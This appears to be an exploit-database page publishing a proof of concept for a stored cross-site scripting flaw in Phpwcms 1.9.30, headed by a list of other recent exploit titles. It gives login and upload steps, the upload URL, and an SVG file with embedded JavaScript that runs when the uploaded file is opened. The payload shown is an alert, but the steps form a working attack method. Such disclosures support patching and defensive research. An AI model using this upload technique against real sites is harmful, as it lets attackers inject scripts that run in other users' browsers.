8955161978
10 changes to exploits/shellcodes Exam Form Submission System 1.0 - SQL Injection Authentication Bypass Drupal Module MiniorangeSAML 8.x-2.22 - Privilege escalation via XML Signature Wrapping Blood Bank System 1.0 - SQL Injection / Authentication Bypass Phpwcms 1.9.30 - File Upload to XSS Vehicle Service Management System 1.0 - Remote Code Execution (RCE) (Unauthenticated) Dairy Farm Shop Management System 1.0 - SQL Injection Authentication Bypass WhatsUpGold 21.0.3 - Stored Cross-Site Scripting (XSS) CMSimple_XH 1.7.4 - Remote Code Execution (RCE) (Authenticated) Directory Management System 1.0 - SQL Injection Authentication Bypass Windows/x86 - WinExec PopCalc PEB & Export Directory Table NullFree Dynamic Shellcode (178 bytes)
35 lines
No EOL
1 KiB
Text
35 lines
No EOL
1 KiB
Text
# Exploit Title: Phpwcms 1.9.30 - File Upload to XSS
|
|
# Date: 30/9/2021
|
|
# Exploit Author: Okan Kurtulus | okankurtulus.com.tr
|
|
# Software Link: http://www.phpwcms.org/
|
|
# Version: 1.9.30
|
|
# Tested on: Ubuntu 16.04
|
|
|
|
Steps:
|
|
|
|
1-) You need to login to the system.
|
|
http://target.com/phpwcms/login.php
|
|
|
|
2-) Creating payload with SVG extension: payload.svg
|
|
|
|
<?xml version="1.0" standalone="no"?>
|
|
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
|
|
|
|
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
|
|
<rect width="300" height="100" style="fill:rgb(255,0,0);stroke-width:3;stroke:rgb(0,0,0)" />
|
|
<script type="text/javascript">
|
|
alert("XSS!");
|
|
</script>
|
|
</svg>
|
|
|
|
|
|
3-) Go to the following link and upload the payload:
|
|
http://target.com/phpwcms/phpwcms.php?csrftoken=b72d02a26550b9877616c851aa6271be&do=files&p=8
|
|
|
|
From the menu:
|
|
|
|
file -> multiple file upload -> Select files or drop here
|
|
|
|
4-) After uploading payload, call it from the link below.
|
|
|
|
http://192.168.1.112/phpwcms/upload/ |